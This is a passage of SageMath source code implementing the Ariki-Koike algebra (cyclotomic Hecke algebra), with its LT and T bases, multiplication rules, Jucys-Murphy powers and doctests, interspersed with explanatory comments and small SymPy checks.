sage: H = algebras.ArikiKoike(3, 4, q=1, u=[1, zeta3, zeta3^2], R=F)
sage: LT = H.LT()
sage: LT.inject_variables()
Defining L1, L2, L3, L4, T1, T2, T3
sage: A = ColoredPermutations(3, 4).algebra(F)
sage: s1, s2, s3, s0 = list(A.algebra_generators())
sage: all(L^3 == LT.one() for L in LT.L())
True
sage: J = [s0, s3*s0*s3, s2*s3*s0*s3*s2, s1*s2*s3*s0*s3*s2*s1]
sage: all(Ji^3 == A.one() for Ji in J)
True
"""
@staticmethod
def __classcall_private__(cls, r, n, q=None, u=None, R=None):
r"""
Standardize input to ensure a unique representation.
TESTS::
sage: H1 = algebras.ArikiKoike(4, 3)
sage: S = PolynomialRing(ZZ, 'u', 4)
sage: R.<q> = LaurentPolynomialRing(S)
sage: H2 = algebras.ArikiKoike(4, 3, q=q)
sage: H3 = algebras.ArikiKoike(4, 3, q, S.gens(), R)
sage: H1 is H2
True
sage: H2 is H3
True
"""
if u is None:
if q is not None:
R = q.parent()
if R is None:
R = PolynomialRing(ZZ, 'u', r)
u = R.gens()
if q is None:
R = LaurentPolynomialRing(R, 'q')
q = R.gen()
else:
u = PolynomialRing(ZZ, 'u', r).gens()
if q is None:
q = 'q'
else:
if not isinstance(u, (list,tuple)):
u = [u]*r
if R is None:
from sage.structure.element import get_coercion_model
cm = get_coercion_model()
if q is None:
R = cm.common_parent(*[val.parent() for val in u])
R = LaurentPolynomialRing(R, 'q')
q = R.gen()
else:
R = cm.common_parent(q.parent(), *[val.parent() for val in u])
elif q is None:
q = 'q'
u = [R(val) for val in u]
if R not in Rings().Commutative():
raise TypeError("base ring must be a commutative ring")
q = R(q)
u = tuple(u)
return super(ArikiKoikeAlgebra, cls).__classcall__(cls, r, n, q, u, R)
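# Editor's sketch of the defaults resolved above: with no arguments, the
# cyclotomic parameters live in a polynomial ring over ZZ and ``q`` in a
# Laurent polynomial ring over that base (assumed Sage session)::
#
#     sage: H = algebras.ArikiKoike(2, 2)
#     sage: H.u()
#     (u0, u1)
#     sage: H.q()
#     q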
def __init__(self, r, n, q, u, R):
r"""
Initialize ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 3)
sage: TestSuite(H).run()
sage: H = algebras.ArikiKoike(1, 4)
sage: TestSuite(H).run()
sage: H = algebras.ArikiKoike(2, 3)
sage: TestSuite(H).run()
sage: H = algebras.ArikiKoike(3, 4)
sage: TestSuite(H).run() # long time
"""
self._r = r
self._n = n
self._q = q
self._u = u
self._category = Algebras(R).FiniteDimensional().WithBasis()
Parent.__init__(self, base=R, category=self._category.WithRealizations())
T = self.T()
LT = self.LT()
T.module_morphism(LT._from_T_basis, codomain=LT).register_as_coercion()
LT.module_morphism(T._from_LT_basis, codomain=T).register_as_coercion()
def _repr_(self):
r"""
Return a string representation of ``self``.
EXAMPLES::
sage: algebras.ArikiKoike(5, 2)
Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4)
over Univariate Laurent Polynomial Ring in q
over Multivariate Polynomial Ring in u0, u1, u2, u3, u4
over Integer Ring
"""
return "Ariki-Koike algebra of rank {} and order {} with q={} and u={} over {}".format(
self._r, self._n, self._q, self._u, self.base_ring())
def _latex_(self):
r"""
Return a latex representation of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: latex(H)
\mathcal{H}_{5,2}(q)
"""
return "\\mathcal{H}_{%s,%s}(%s)"%(self._r, self._n, self._q)
def hecke_parameter(self):
r"""
Return the Hecke parameter `q` of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 3)
sage: H.hecke_parameter()
q
"""
return self._q
q = hecke_parameter
def cyclotomic_parameters(self):
r"""
Return the cyclotomic parameters `u` of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 3)
sage: H.cyclotomic_parameters()
(u0, u1, u2, u3, u4)
"""
return self._u
u = cyclotomic_parameters
def a_realization(self):
r"""
Return a realization of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: H.a_realization()
Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) ... in the LT-basis
"""
return self.LT()
class _BasesCategory(Category_realization_of_parent):
r"""
The category of bases of an Ariki-Koike algebra.
"""
def __init__(self, base):
r"""
Initialize ``self``.
INPUT:
- ``base`` -- an Ariki-Koike algebra
TESTS::
sage: H = algebras.ArikiKoike(5, 2)
sage: bases = H._BasesCategory()
sage: H.T() in bases
True
"""
Category_realization_of_parent.__init__(self, base)
def super_categories(self):
r"""
The super categories of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: bases = H._BasesCategory()
sage: bases.super_categories()
[Category of realizations of Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) over ...,
Category of finite dimensional algebras with basis over ...]
"""
return [Realizations(self.base()), self.base()._category]
def _repr_(self):
r"""
Return the representation of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: H._BasesCategory()
Category of bases of Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) over ...
"""
return "Category of bases of %s" % self.base()
class ParentMethods:
r"""
This class collects code common to all the various bases. In most
cases, these are just default implementations that will get
specialized in a basis.
"""
def _repr_(self):
r"""
Text representation of this basis of the Ariki-Koike algebra.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: H.T()
Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) ... in the T-basis
sage: H.LT()
Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) ... in the LT-basis
"""
return "%s in the %s-basis"%(self.realization_of(), self._realization_name())
def hecke_parameter(self):
r"""
Return the Hecke parameter `q` of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: LT.hecke_parameter()
q
"""
return self._q
q = hecke_parameter
def cyclotomic_parameters(self):
r"""
Return the cyclotomic parameters `u` of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: LT.cyclotomic_parameters()
(u0, u1, u2, u3, u4)
"""
return self._u
u = cyclotomic_parameters
@cached_method
def gens(self):
r"""
Return the generators of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: LT.gens()
(L1, L2, L3, T[1], T[2])
"""
return tuple(self.algebra_generators())
def dimension(self):
r"""
Return the dimension of ``self``.
The dimension of `H_{r,n}(q, u)` is `r^n n!`.
EXAMPLES::
sage: LT = algebras.ArikiKoike(8, 3).LT()
sage: LT.dimension()
3072
sage: LT = algebras.ArikiKoike(6, 3).LT()
sage: LT.dimension()
1296
sage: LT = algebras.ArikiKoike(3, 5).LT()
sage: LT.dimension()
29160
"""
from sage.arith.all import factorial
return self._r**self._n * factorial(self._n)
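# Editor's cross-check of the formula above, in plain arithmetic:
#   r=8, n=3: 8**3 * factorial(3) = 512 * 6   = 3072
#   r=6, n=3: 6**3 * factorial(3) = 216 * 6   = 1296
#   r=3, n=5: 3**5 * factorial(5) = 243 * 120 = 29160
# matching the doctests above.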
def some_elements(self):
r"""
Return a list of elements of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(4, 3).LT()
sage: LT.some_elements()
[1 + 2*T[2] + 3*T[1] + T[2,1],
L1, L2, L3, T[1], T[2], L1^2, L2^2]
"""
G = self.algebra_generators()
elts = [self.an_element()] + list(G)
elts += [self.L(1)**2]
if self._n > 1:
elts += [self.L(2)**(self._r//2)]
return elts
# -----------------------------------------------------
# Basis classes
# -----------------------------------------------------
class LT(_Basis):
r"""
The basis of the Ariki-Koike algebra given by monomials of the
form `L T`, where `L` is product of Jucys-Murphy elements and
`T` is a product of `\{ T_i | 0 < i < n \}`.
This was the basis defined in [AK1994]_ except using the
renormalized Jucys-Murphy elements.
"""
def __init__(self, algebra):
r"""
Initialize ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: TestSuite(LT).run()
sage: LT = algebras.ArikiKoike(1, 4).LT()
sage: TestSuite(LT).run()
sage: LT = algebras.ArikiKoike(2, 3).LT()
sage: TestSuite(LT).run()
sage: LT = algebras.ArikiKoike(3, 4).LT()
sage: TestSuite(LT).run() # long time
"""
_Basis.__init__(self, algebra, prefix='LT')
self._assign_names(self.algebra_generators().keys())
def _repr_term(self, m):
r"""
Return a string representation of the basis element indexed by ``m``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(4, 3).LT()
sage: LT._repr_term( ((1, 0, 2), Permutation([3,2,1])) )
'L1*L3^2*T[2,1,2]'
"""
gen_str = lambda e: '' if e == 1 else '^%s'%e
lhs = '*'.join('L%s'%(j+1) + gen_str(i)
for j,i in enumerate(m[0]) if i > 0)
redword = m[1].reduced_word()
if not redword:
if not lhs:
return '1'
return lhs
rhs = 'T[{}]'.format(','.join(str(i) for i in redword))
if not lhs:
return rhs
return lhs + '*' + rhs
def _latex_term(self, m):
r"""
Return a latex representation for the basis element indexed by ``m``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(4, 3).LT()
sage: LT._latex_term( ((1, 0, 2), Permutation([3,2,1])) )
'L_{1} L_{3}^{2} T_{2} T_{1} T_{2}'
"""
gen_str = lambda e: '' if e == 1 else '^{%s}'%e
lhs = ' '.join('L_{%s}'%(j+1) + gen_str(i)
for j,i in enumerate(m[0]) if i > 0)
redword = m[1].reduced_word()
if not redword:
if not lhs:
return '1'
return lhs
return lhs + ' ' + ' '.join("T_{%d}"%i for i in redword)
def _from_T_basis(self, t):
r"""
Return the image of the `T` basis element indexed
by ``t`` in ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(3, 3)
sage: LT = H.LT()
sage: T = H.T()
sage: all(LT(Li) == LT.L(i+1) for i,Li in enumerate(T.L()))
True
sage: all(LT(Ti) == LT.T(i) for i,Ti in enumerate(T.T()))
True
sage: all(LT(T(b)) == b for b in LT.basis()) # long time
True
sage: H = algebras.ArikiKoike(1, 3)
sage: LT = H.LT()
sage: T = H.T()
sage: all(LT(Li) == LT.L(i+1) for i,Li in enumerate(T.L()))
True
sage: all(LT(T(b)) == b for b in LT.basis()) # indirect doctest
True
"""
# Compute the corresponding reduced word for the first part
ret = self.one()
T = list(self._zero_tuple)
one = self.base_ring().one()
for i,k in enumerate(t[0]):
if k == 0:
continue
perm = self._Pn.prod(self._Pn.simple_reflection(j)
for j in range(1,i+1))
ret = ret * self._from_dict({(self._zero_tuple, perm): one},
remove_zeros=False, coerce=False)
T[0] = k
ret = ret * self._from_dict({(tuple(T), self._one_perm): one},
remove_zeros=False, coerce=False)
return ret * self._from_dict({(self._zero_tuple, t[1]): one},
remove_zeros=False, coerce=False)
@cached_method
def algebra_generators(self):
r"""
Return the algebra generators of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: dict(LT.algebra_generators())
{'L1': L1, 'L2': L2, 'L3': L3, 'T1': T[1], 'T2': T[2]}
sage: LT = algebras.ArikiKoike(1, 4).LT()
sage: dict(LT.algebra_generators())
{'T1': T[1], 'T2': T[2], 'T3': T[3]}
"""
d = {}
if self._r != 1:
for i in range(self._n):
r = list(self._zero_tuple) # Make a copy
r[i] = 1
d['L%s'%(i+1)] = self.monomial( (tuple(r), self._one_perm) )
G = self._Pn.group_generators()
for i in range(1, self._n):
d['T%s'%i] = self.monomial( (self._zero_tuple, G[i]) )
return Family(sorted(d), lambda i: d[i])
def T(self, i=None):
r"""
Return the generator(s) `T_i` of ``self``.
INPUT:
- ``i`` -- (default: ``None``) the generator `T_i` or
if ``None``, then the list of all generators `T_i`
EXAMPLES::
sage: LT = algebras.ArikiKoike(8, 3).LT()
sage: LT.T(1)
T[1]
sage: LT.T()
[L1, T[1], T[2]]
sage: LT.T(0)
L1
"""
G = self.algebra_generators()
if i is None:
return [G['L1']] + [G['T%s'%j] for j in range(1, self._n)]
if i == 0:
return G['L1']
return G['T%s'%i]
def L(self, i=None):
r"""
Return the generator(s) `L_i`.
INPUT:
- ``i`` -- (default: ``None``) the generator `L_i` or
if ``None``, then the list of all generators `L_i`
EXAMPLES::
sage: LT = algebras.ArikiKoike(8, 3).LT()
sage: LT.L(2)
L2
sage: LT.L()
[L1, L2, L3]
sage: LT = algebras.ArikiKoike(1, 3).LT()
sage: LT.L(2)
u + (-u*q^-1+u)*T[1]
sage: LT.L()
[u,
u + (-u*q^-1+u)*T[1],
u + (-u*q^-1+u)*T[2] + (-u*q^-2+u*q^-1)*T[2,1,2]]
"""
G = self.algebra_generators()
if i is None:
if self._r == 1:
return [self._Li_power(j, 1) for j in range(1, self._n+1)]
return [G['L%s'%j] for j in range(1, self._n+1)]
if self._r == 1:
return self._Li_power(i, 1)
return G['L%s'%i]
@cached_method
def product_on_basis(self, m1, m2):
r"""
Return the product of the basis elements indexed
by ``m1`` and ``m2``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(6, 3).LT()
sage: m = ((1, 0, 2), Permutations(3)([2,1,3]))
sage: LT.product_on_basis(m, m)
q*L1*L2*L3^4
sage: LT = algebras.ArikiKoike(4, 3).LT()
sage: L1,L2,L3,T1,T2 = LT.algebra_generators()
sage: L1 * T1 * L1^2 * T1
q*L1*L2^2 + (1-q)*L1^2*L2*T[1]
sage: L1^2 * T1 * L1^2 * T1
q*L1^2*L2^2 + (1-q)*L1^3*L2*T[1]
sage: L1^3 * T1 * L1^2 * T1
(-u0*u1*u2*u3+u0*u1*u2*u3*q)*L2*T[1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3)+(-u0*u1*u2-u0*u1*u3-u0*u2*u3-u1*u2*u3)*q)*L1*L2*T[1]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3)+(u0*u1+u0*u2+u1*u2+u0*u3+u1*u3+u2*u3)*q)*L1^2*L2*T[1]
+ ((u0+u1+u2+u3)+(-u0-u1-u2-u3)*q)*L1^3*L2*T[1] + q*L1^3*L2^2
sage: L1^2 * T1 * L1^3 * T1
(-u0*u1*u2*u3+u0*u1*u2*u3*q)*L2*T[1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3)+(-u0*u1*u2-u0*u1*u3-u0*u2*u3-u1*u2*u3)*q)*L1*L2*T[1]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3)+(u0*u1+u0*u2+u1*u2+u0*u3+u1*u3+u2*u3)*q)*L1^2*L2*T[1]
+ q*L1^2*L2^3
+ ((u0+u1+u2+u3)+(-u0-u1-u2-u3)*q)*L1^3*L2*T[1]
+ (1-q)*L1^3*L2^2*T[1]
sage: L1^2 * T1*T2*T1 * L2 * L3 * T2
(q-2*q^2+q^3)*L1^2*L2*L3 - (1-2*q+2*q^2-q^3)*L1^2*L2*L3*T[2]
- (q-q^2)*L1^3*L3*T[1] + (1-2*q+q^2)*L1^3*L3*T[1,2]
+ q*L1^3*L2*T[2,1] - (1-q)*L1^3*L2*T[2,1,2]
sage: LT = algebras.ArikiKoike(2, 3).LT()
sage: L3 = LT.L(3)
sage: x = LT.an_element()
sage: (x * L3) * L3 == x * (L3 * L3)
True
"""
# Although it is tempting to make this recursive, some care must be
# taken here to ensure that the various "helper" methods return
# linear combinations of "standard" basis elements of the form
# (L,w), where L is an n-tuple and w is a permutation, because
# otherwise we may end up in an infinite loop...
# Product is of the form L1*T1*L2*T2: separate the L's and permutations
L1,T1 = m1
L2,T2 = m2
if sum(L2) == 0:
# Compute and return the product of T1 and T2, whilst fixing L
return self._from_dict(self._product_LTwTv(L1, T1, T2),
remove_zeros=False, coerce=False)
# If T1 is trivial then we just have L1*L2*T2, so we only need to rewrite
# all of the "large" powers that appear in L1*L2. Unfortunately, this
# will almost certainly introduce more T_w's, and it will be recursive
# because L_n^r, for example, will introduce many powers of L_k for k<n.
if T1 == self._one_perm:
Lbig = list(self._zero_tuple) # separate the "big" and small
Lsmall = list(self._zero_tuple) # powers of the Lk's
for i in range(self._n):
s = L1[i] + L2[i]
if s < self._r:
Lsmall[i] = s
else:
Lbig[i] = s
if tuple(Lbig) == self._zero_tuple:
# if no big powers we only need to combine Lsmall and T2
return self.monomial((tuple(Lsmall), T2))
# The L variables all commute, so we can multiply them in any order
# that we like. For improved efficiency, however, we move the Ls to
# the left as soon as we can, and we multiply the
# "big" powers in the order L_n^N L_{n-1}^N ... L_1^N, as this
# way we have to expand fewer powers of the Lk's later.
return (self.monomial((tuple(Lsmall), self._one_perm))
* prod(self._Li_power(i+1, Lbig[i])
for i in reversed(range(self._n)) if Lbig[i] > 0)
* self.monomial((self._zero_tuple, T2))
)
# If we are still here then both T1 and L2 are non-trivial. Using the
# method _product_Tw_L we expand the product T1*L2 as a linear
# combination of standard basis elements using the method and then,
# recursively, multiply on the left and right by L1 and T2,
# respectively. In other words, we multiply as L1*(T1*L2)*T2.
return ( self.monomial((L1, self._one_perm))
* self._product_Tw_L(T1, L2)
* self.monomial((self._zero_tuple, T2)) )
def _product_LTwTv(self, L, w, v):
r"""
Return the product `L * T_w * T_v` as a linear combination of
terms of the form `L * T_x`.
The main point of this method is that it computes the product
`L T_w T_v` and returns it as a linear combination of standard
basis elements. That is, terms of the form `L T_x`. The monomial
``L`` does not play a role in this calculation and, instead, it
is kept as a placeholder for the "L-component" of the product.
For this calculation the most important point is that
.. MATH::
T_i T_v = \begin{cases}
T_{s_i v}, & \text{if } \ell(s_iv) > \ell(v),\\
q T_{s_i v} + (q-1)T_v, & \text{if } \ell(s_iv) < \ell(v).
\end{cases}
This observation is used to rewrite the product `L T_w T_v`
as a linear combination of standard basis elements.
.. WARNING::
This method is not intended to be called directly and, instead,
is used by :meth:`product_on_basis`.
INPUT:
- ``L`` -- an `n`-tuple
- ``w`` -- the permutation ``w``
- ``v`` -- the permutation ``v``
OUTPUT:
The corresponding element represented as a ``dict``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 4).LT()
sage: P4 = Permutations(4)
sage: H._from_dict( H._product_LTwTv((0, 3, 2, 4), P4([1,3,2,4]), P4([1,3,2,4])) )
q*L2^3*L3^2*L4^4 - (1-q)*L2^3*L3^2*L4^4*T[2]
sage: H._from_dict( H._product_LTwTv((0, 3, 2, 4), P4([1,3,2,4]), P4([1,3,4,2])) )
q*L2^3*L3^2*L4^4*T[3] - (1-q)*L2^3*L3^2*L4^4*T[2,3]
sage: H._from_dict( H._product_LTwTv((0, 3, 2, 4), P4([1,4,3,2]), P4([1,4,3,2])) )
q^3*L2^3*L3^2*L4^4 - (q^2-q^3)*L2^3*L3^2*L4^4*T[3]
- (q^2-q^3)*L2^3*L3^2*L4^4*T[2]
+ (q-2*q^2+q^3)*L2^3*L3^2*L4^4*T[2,3]
+ (q-2*q^2+q^3)*L2^3*L3^2*L4^4*T[3,2]
- (1-2*q+2*q^2-q^3)*L2^3*L3^2*L4^4*T[3,2,3]
"""
ret = {v: self.base_ring().one()}
qm1 = self._q - self.base_ring().one()
for i in reversed(w.reduced_word()):
temp = {} # start from 0
for p in ret:
c = ret[p]
# We have to flip the side due to Sage's
# convention for multiplying permutations
pi = p.apply_simple_reflection(i, side="left")
if p.has_descent(i, side="left"):
iaxpy(1, {p: c * qm1, pi: c * self._q}, temp)
else:
iaxpy(1, {pi: c}, temp)
ret = temp
return {(L, p): ret[p] for p in ret}
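# Editor's worked instance of the case split above: with ``w = v = s_1`` the
# descent case applies and reduces to the quadratic relation
# ``T_1^2 = (q-1) T_1 + q`` (assumed Sage session)::
#
#     sage: H = algebras.ArikiKoike(2, 2).LT()
#     sage: T1 = H.T(1); q = H.q()
#     sage: T1 * T1 == (q - 1)*T1 + q
#     True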
def _product_Tw_L(self, w, L):
r"""
Given a permutation ``w`` and a monomial ``L`` return the product
`T_w L` as a linear combination of terms of the form `L_v T_v`.
To do this we write `w = s_{i_1} \cdots s_{i_k}` and then push each
`T_{i_a}` past `L` using Lemma 3.2 of [MM1998]_ (cf. Lemma 3.3 and
Proposition 3.4 of [AK1994]_), which says
.. MATH::
T_i L_i^a L_{i+1}^b = L_i^b L_{i+1}^a T_i + \begin{cases}
(q-1) \sum_{k=0}^{b-a-1} L_i^{a+k} L_{i+1}^{b-k}, &\text{if } a < b,\\
(1-q) \sum_{k=0}^{a-b-1} L_i^{b+k} L_{i+1}^{a-k}, &\text{if } a > b,\\
0, &\text{if } a = b.
\end{cases}
Of course, `T_i` commutes with `L_k`, for `k \neq i,i+1`.
This method is not intended to be called directly and, instead,
is used by :meth:`product_on_basis`.
INPUT:
- ``w`` -- a permutation
- ``L`` -- a tuple `(a_1, \ldots, a_n)`
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 4).LT()
sage: P4 = Permutations(4)
sage: H._product_Tw_L(P4([1,3,2,4]), (0,2,2,0))
L2^2*L3^2*T[2]
sage: H._product_Tw_L(P4([1,3,2,4]), (0,1,3,0))
-(1-q)*L2*L3^3 - (1-q)*L2^2*L3^2 + L2^3*L3*T[2]
sage: H._product_Tw_L(P4([1,3,2,4]), (0,3,1,0))
(1-q)*L2*L3^3 + L2*L3^3*T[2] + (1-q)*L2^2*L3^2
sage: H._product_Tw_L(P4([1,3,2,4]), (2,3,1,3))
(1-q)*L1^2*L2*L3^3*L4^3 + L1^2*L2*L3^3*L4^3*T[2] + (1-q)*L1^2*L2^2*L3^2*L4^3
"""
# initialize wL to L: this is what we will eventually return
wL = {(L, self._one_perm): self.base_ring().one()}
q = self._q
one = q.parent().one()
for i in w.reduced_word()[::-1]:
iL = {} # this will become T_i * L, written in standard form
for lv in wL:
c = wL[lv]
L = list(lv[0]) # make a copy
v = lv[1]
a, b = L[i-1], L[i]
L[i-1], L[i] = L[i], L[i-1] # swap L_i=L[i-1] and L_{i+1}=L[i]
# the term L_1^{a_1} ... L_i^{a_{i+1}} L_{i+1}^{a_i} ... L_n^{a_n} T_i T_v
# always appears
iaxpy(c, self._product_LTwTv(tuple(L), self._Pn.simple_reflections()[i], v), iL) # need T_i*T_v
if a < b:
Ls = [ list(L) for k in range(b-a) ] # make copies of L
for k in range(b-a):
Ls[k][i-1] = a + k
Ls[k][i] = b - k
c *= (q - one)
iaxpy(1, {(tuple(l), v): c for l in Ls}, iL)
elif a > b:
Ls = [ list(L) for k in range(a-b) ] # make copies of L
for k in range(a-b):
Ls[k][i-1] = b + k
Ls[k][i] = a - k
c *= (one - q)
iaxpy(1, {(tuple(l), v): c for l in Ls}, iL)
wL = iL # replace wL with iL and repeat
return self._from_dict(wL, remove_zeros=False, coerce=False)
@cached_method
def _Li_power(self, i, m):
r"""
Return `L_i^m`, where `m \geq 0`.
To compute `L_i^m` we use Corollary 3.4 of [MM1998]_ which says that
.. MATH::
L_i^m = q^{-1} T_{i-1} L_{i-1}^m T_{i-1}
+ (1 - q^{-1}) \sum_{c=1}^{m-1} L_i^c L_{i-1}^{m-c} T_{i-1}.
.. WARNING::
This function is used internally by the multiplication and
may return elements that are not in the basis. However
these will eventually be resolved after the product has
been computed::
sage: H = algebras.ArikiKoike(3, 2).LT()
sage: L2 = H.L(2)
sage: H._Li_power(2, 4)
((u0^2*u1*u2+u0*u1^2*u2+u0*u1*u2^2)) + ...
- (q^-1-1)*L1*L2^3*T[1] ...
- (q^-1-1)*L1^3*L2*T[1]
sage: H._Li_power(2, 4) == L2^4
False
sage: L2 * H._Li_power(2, 4) == L2^5
True
EXAMPLES::
sage: H = algebras.ArikiKoike(3, 3).LT()
sage: for i in range(1,4):
....: for m in range(4):
....: print('L_{}^{} = {}'.format(i,m,H._Li_power(i,m)))
L_1^0 = 1
L_1^1 = L1
L_1^2 = L1^2
L_1^3 = u0*u1*u2 + ((-u0*u1-u0*u2-u1*u2))*L1 + ((u0+u1+u2))*L1^2
L_2^0 = 1
L_2^1 = L2
L_2^2 = L2^2
L_2^3 = u0*u1*u2 + (-u0*u1*u2*q^-1+u0*u1*u2)*T[1]
+ ((-u0*u1-u0*u2-u1*u2))*L2 + ((u0+u1+u2))*L2^2
+ ((u0+u1+u2)*q^-1+(-u0-u1-u2))*L1*L2*T[1]
- (q^-1-1)*L1*L2^2*T[1] - (q^-1-1)*L1^2*L2*T[1]
L_3^0 = 1
L_3^1 = L3
L_3^2 = L3^2
L_3^3 = u0*u1*u2 + (-u0*u1*u2*q^-1+u0*u1*u2)*T[2]
+ (-u0*u1*u2*q^-2+u0*u1*u2*q^-1)*T[2,1,2]
+ ((-u0*u1-u0*u2-u1*u2))*L3 + ((u0+u1+u2))*L3^2
+ ((u0+u1+u2)*q^-1+(-u0-u1-u2))*L2*L3*T[2]
- (q^-1-1)*L2*L3^2*T[2] - (q^-1-1)*L2^2*L3*T[2]
+ ((u0+u1+u2)*q^-2+(-2*u0-2*u1-2*u2)*q^-1+(u0+u1+u2))*L1*L3*T[1,2]
+ ((u0+u1+u2)*q^-2+(-u0-u1-u2)*q^-1)*L1*L3*T[2,1,2]
- (q^-2-2*q^-1+1)*L1*L3^2*T[1,2] - (q^-2-q^-1)*L1*L3^2*T[2,1,2]
- (q^-2-2*q^-1+1)*L1*L2*L3*T[1,2] - (q^-2-2*q^-1+1)*L1^2*L3*T[1,2]
- (q^-2-q^-1)*L1^2*L3*T[2,1,2]
"""
# shorthand for returning a tuple of the form (0,...,a,b,...,0) with a,b
# in the (i-1)th and i-th positions, respectively
def Ltuple(a, b):
return tuple([b if j == i else a if j == i-1 else 0
for j in range(1,self._n+1)])
# return "small" powers of the generators without change
if m < self._r:
return self.monomial( (Ltuple(0, m), self._one_perm) )
if i > 1:
si = self._Pn.simple_reflections()[i-1]
qsum = self.base_ring().one() - self._q**-1
# by calling _Li_power we avoid infinite recursion here
return ( self.sum_of_terms( ((Ltuple(c, m-c), si), qsum) for c in range(1, m) )
+ self._q**-1 * self.T(i-1) * self._Li_power(i-1, m) * self.T(i-1) )
# now left with the case i = 1 and m >= r
if m > self._r:
return self.monomial((Ltuple(0, 1), self._one_perm)) * self._Li_power(i,m-1)
z = PolynomialRing(self.base_ring(), 'DUMMY').gen()
p = list(prod(z - val for val in self._u))
p.pop() # remove the highest power
zero = self.base_ring().zero()
return self._from_dict({(Ltuple(0, exp), self._one_perm): -coeff
for exp,coeff in enumerate(p) if coeff != zero},
remove_zeros=False, coerce=False)
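# A standalone sketch (not from this module; assumes SymPy is available) of
# the base case just above: for i = 1 and m = r the cyclotomic relation
# prod(L_1 - u_j) = 0 rewrites L_1^r in lower powers, which is what the
# dictionary comprehension builds.  Here r = 3 and z stands in for L_1.
import sympy
z, u0, u1, u2 = sympy.symbols('z u0 u1 u2')
coeffs = sympy.Poly(sympy.prod([z - u for u in (u0, u1, u2)]), z).all_coeffs()
L1_cubed = -sum(c * z**e for e, c in enumerate(reversed(coeffs[1:])))
# L1_cubed == u0*u1*u2 - (u0*u1 + u0*u2 + u1*u2)*z + (u0 + u1 + u2)*z**2,
# matching the doctest value of L_1^3 in the EXAMPLES above.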
@cached_method
def inverse_T(self, i):
r"""
Return the inverse of the generator `T_i`.
From the quadratic relation, we have
.. MATH::
T_i^{-1} = q^{-1} T_i + (q^{-1} - 1).
EXAMPLES::
sage: LT = algebras.ArikiKoike(3, 4).LT()
sage: [LT.inverse_T(i) for i in range(1, 4)]
[(q^-1-1) + (q^-1)*T[1],
(q^-1-1) + (q^-1)*T[2],
(q^-1-1) + (q^-1)*T[3]]
TESTS::
sage: LT = algebras.ArikiKoike(4, 4).LT()
sage: all(LT.inverse_T(i) * LT.T(i) == LT.one() for i in range(1, 4))
True
sage: all(LT.T(i) * LT.inverse_T(i) == LT.one() for i in range(1, 4))
True
"""
c = ~self._q - self.base_ring().one()
m = self.T(i).leading_support()
return self._from_dict({m: ~self._q, self.one_basis(): c})
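# A quick standalone check (not from this module; assumes SymPy) that the
# formula above inverts T_i modulo the quadratic relation
# T^2 = (q - 1)*T + q:
import sympy
q, T = sympy.symbols('q T')
Tinv = T/q + (1/q - 1)
check = sympy.expand(T * Tinv).subs(T**2, (q - 1)*T + q)
assert sympy.simplify(check) == 1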
class Element(CombinatorialFreeModule.Element):
def inverse(self):
r"""
Return the inverse if ``self`` is a basis element.
EXAMPLES::
sage: LT = algebras.ArikiKoike(3, 4).LT()
sage: t = LT.T(1) * LT.T(2) * LT.T(3); t
T[1,2,3]
sage: t.inverse()
(q^-3-3*q^-2+3*q^-1-1) + (q^-3-2*q^-2+q^-1)*T[3]
+ (q^-3-2*q^-2+q^-1)*T[2] + (q^-3-q^-2)*T[3,2]
+ (q^-3-2*q^-2+q^-1)*T[1] + (q^-3-q^-2)*T[1,3]
+ (q^-3-q^-2)*T[2,1] + (q^-3)*T[3,2,1]
"""
if len(self) != 1:
raise NotImplementedError("inverse only implemented for monomials")
l,w = self.support_of_term()
if sum(l) != 0:
raise NotImplementedError("inverse only implemented for monomials in T variables")
H = self.parent()
return ~self[l,w] * H.prod(H.inverse_T(i) for i in reversed(w.reduced_word()))
__invert__ = inverse
class T(_Basis):
r"""
The basis of the Ariki-Koike algebra given by monomials of the
generators `\{ T_i | 0 \leq i < n \}`.
We use the choice of reduced expression given by [BM1997]_:
.. MATH::
T_{1,a_1} \cdots T_{n,a_n} T_w,
where `T_{i,k} = T_{i-1} \cdots T_2 T_1 T_0^k` (note that
`T_{1,k} = T_0^k`) and `w` is a reduced expression of an
element in `\mathfrak{S}_n`.
"""
def __init__(self, algebra):
r"""
Initialize ``self``.
EXAMPLES::
sage: T = algebras.ArikiKoike(5, 3).T()
sage: TestSuite(T).run()
sage: T = algebras.ArikiKoike(1, 4).T()
sage: TestSuite(T).run()
sage: T = algebras.ArikiKoike(2, 3).T()
sage: TestSuite(T).run()
sage: T = algebras.ArikiKoike(3, 4).T()
